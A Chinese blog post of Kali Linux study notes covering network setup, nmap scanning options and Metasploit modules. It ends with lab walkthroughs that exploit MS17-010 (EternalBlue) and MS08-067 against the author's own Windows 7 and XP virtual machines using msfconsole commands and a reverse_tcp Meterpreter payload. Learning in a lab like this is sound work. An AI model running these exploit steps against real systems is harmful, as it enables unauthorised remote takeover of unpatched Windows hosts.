当前位置:   article > 正文

kali的学习_kali网络配置

kali网络配置

网络配置

1.kali的网络设置

首先我们了解kali的网络设置

  1. DHCP:动态主机配置协议 是一个局域网的协议 使用UDP 协议工作
  2. 静态IP:用于大部分的中小型网络 通过网络管理员手动分配IP

原理进程

  1. /etc 系统大部分服务启动过程都要访问该目录
  2. 我们直接去看看
  3. /ect/network/interfaces
  1. 这里就可以配置两个
  2. 1.DHCP:
  3. auto eth0
  4. iface eth0 inet dhcp //配置eth0使用DHCP协议
  5. 2.静态ip
  6. auto eth0
  7. iface eth0 inet static //配置eth0使用默认的静态地址
  8. address 192.168.0.90 //设置eth0的IP地址,根据需求配置
  9. gateway 192.168.0.1 //配置当前主机的默认网关,根据需求配置
  10. netmask 255.255.255.0 //配置eth0的子网掩码,根据需求配置

然后就是设置 DNS

  1. resolv.conf中 可以配置3 个 nameserver
  2. 一旦前面失效 就会尝试下一个
  1. vi /etc/resolv.conf #进行DNS编辑
  2. nameserver 114.114.114.114 //国内移动、电信和联通通用的DNS
  3. nameserver 8.8.8.8 //是谷歌的IP地址
  4. nameserver 223.5.5.5 //是阿里云的IP地址
  5. nameserver 180.76.76.87 //是百度的IP地址
  6. 保存,退出

然后进行重启网络设置

sudo service networking restart

2.kali的三种模式

  1. NAT 网络地址转移模式
  2. Bridged 桥接模式
  3. Host-Only 主机模式

NAT

  1. NAT 就是虚拟系统会通过 宿主机 来访问外网
  2. 相当于主机存在两个网卡
  3. 一个是虚拟网卡 一个宿主机的网卡
  4. 当虚拟网卡想要访问外网的时候 就必须通过宿主机的IP地址
  5. 从外面看 就是宿主机的IP 是完全看不到虚拟环境的内部网络
  6. 这个时候
  7. 虚拟机和宿主机和虚拟交换机形成一个网段
  8. 宿主机和真实交换机形成一个网段
  1. 优点
  2. 不需要自己手动分配ip
  3. 只要宿主能访问即可

Bridged

  1. 桥接模式就是 虚拟网卡和物理网卡通过 VMnet0虚拟交换机进行桥接
  2. 这个时候 VMnet0就相当于现实的交换机
  3. 他可以访问这个网络内的所有主机
  4. 但是需要手动设置 ip 子网掩码
  5. 这个模式中 可以互相ping

 Host-Only

  1. 在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。
  2. 其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。

kali的网络设置及三种网络模式_kali配置网络_木_木的博客-CSDN博客

NMAP

ctf工具Nmap使用教程图文教程(超详细)_ctf 端口扫描_程序员小麦的博客-CSDN博客

一.端口扫描

扫描主机开发的端口 与服务(默认是1000个端口)

nmap [ip]

这里将我本机的端口扫描出来了 并且显示了 每个端口的服务是什么

1.指定端口

其中我们可以对主机进行指定端口扫描 通过 -p指令

  1. nmap 192.168.3.25 -p 80 单个
  2. nmap 192.168.3.25 -p 1-80 范围
  3. nmap 192.168.3.25 -p 80,3389,22,21 枚举
  4. nmap 192.168.3.25 -p 1-65535 范围
  5. nmap 192.168.3.25 -p- 相当于 1-65536

 2.指定扫描方式

-sT 使用三次完整的握手来判断存活 否则失败
-sS  通过两次握手来 如果对方传回确认帧 那么就存活

二.主机存活

  1. 可以扫描哪里主机存活
  2. -sP 不扫描端口 只扫描主机
  3. 其实实质上就是 ping 只要ping通 就说明存活
nmap 192.168.3.0/24 -sP

上面显示了 256个IP中存在3个活着的 主机

三.服务扫描

  1. 在扫描端口的时候 会默认显示端口存在的服务
  2. 如果要查看服务的具体版本 就可以使用 -sV
nmap 192.168.3.25 -p 80 -sV

发现是 apache 的服务器

四.系统识别

  1. -O 可以识别端口的主机的系统
  2. nmap 192.168.3.25 -p 80 -O

 发现这里就显示 run在 win10上

五.探测防火墙

我们可以通过 nmap 来探测防火墙的存在

nmap 192.168.3.25  -sF

组合命令

  1. T4可以指定时序 0-5 级别越高 速度越快 越容易被防火墙ban
  2. nmap -F -T4 -P0
  3. -F 100个端口 -P0 无ping扫描

  1. nmap -sC -sV -Pn 192.168.3.25
  2. -sC 通过 nmap 脚本探测
  3. -Pn 进制ping 后扫描
  4. -sV 版本探测

 

nmap -A -v -T4 +IP

 MSF

  1. MATESPLOIT(MSF)是个免费开源的 攻击框架
  2. 附带了很多已知 知名的漏洞
  3. 在刚刚MSF出现的时候 只要会使用 MSF 就可以对未打补丁或刚刚打补丁的进行攻击

在kali中自带了 MSF

所以我们只需要启动即可

msfconsole

 这里对MSF的几个模块进行解释

  1. 1、Auxiliary(辅助模块)
  2. 收集信息 提供大量辅助的一个模块
  3. 2、Exploits(攻击模块)
  4. 通过调动漏洞 进行攻击
  5. 3、Payload(攻击载荷模块)
  6. 攻击成功后促使靶机运行的一段植入代码
  7. 4、Post (后渗透攻击模块)
  8. 收集更多信息或进一步访问被利用的目标系统
  9. 5、Encoders(编码模块)
  10. 就是通过 编码绕过

首先来了解一下基础的用法

【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客

  1. msfconsole
  2. 进入 msf框架
  3. search ms17_010
  4. 通过 search 命令查找漏洞
  5. use exploit/windows/smb/ms17_010_eternalblue
  6. 通过 use 进入模块
  7. info
  8. 查看设置
  9. set payload windows/x64/meterpreter/reverse_tcp
  10. 设置 攻击模块为 这个漏洞
  11. options
  12. 查看参数
  13. set RHOST 192.168.100.158
  14. 设置攻击对象
  15. run
  16. 进行攻击

大致就差不多是这样

我们复现一下 永恒之蓝 ms17-010

首先准备win7 的 IP  地址 我这里是 192.168.222.133

我们先通过 nmap 查看 一个网段存活的主机

nmap -sS 192.168.222.0/24

发现存在 5 个 其中能发现我们要攻击的主机ip

133

 那么我们就看看 他是什么系统的

nmap -O 192.168.222.133

 然后使用 nmap的脚本查看存在什么漏洞

nmap --script=vuln 192.168.222.133

 发现主角了 ms17-010 那么我们就请出MSF

  1. msfconsole
  2. search ms17-010

 这里exp的都是漏洞利用模块的 auxiliary是辅助探测模块 所以我们先通过 辅助探测 看看存不存在漏洞

这里直接 use 3

 然后看看info

 发现了 这里rhosts没有设置 而且是必须设置的选项

那我们就设置 为 攻击目标的ip范围

注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
set rhosts 192.168.222.100-192.168.222.190

exploit

扫到了

那我们直接通过

Exploit漏洞利用模块 对目标进行攻击
set rhosts 192.168.222.133

然后run 即可

 

这样就成功拿到shell了

 接下来复现另一个漏洞

MS08-067

ms08-067漏洞复现_ms08-067复现_老司机开代码的博客-CSDN博客

MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。

首先需要一个 xp的系统 一样这里的ip为137

那我们直接开始

nmap -sS 192.168.222.0/24

我们看看什么系统

nmap -O 192.168.222.137

发现也无法确定 那我们直接就 通过脚本扫

nmap --script=vuln 192.168.222.137

 扫到了 并且也存在永恒之蓝

那我们直接启动  msf

  1. msfconsole
  2. search MS08-067

  1. use 0
  2. options

  1. set RHOSTS 192.168.222.137
  2. show targets

  1. set target 34
  2. run

成功调用了cmd

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家自动化/article/detail/494007
推荐阅读
相关标签
  

闽ICP备14008679号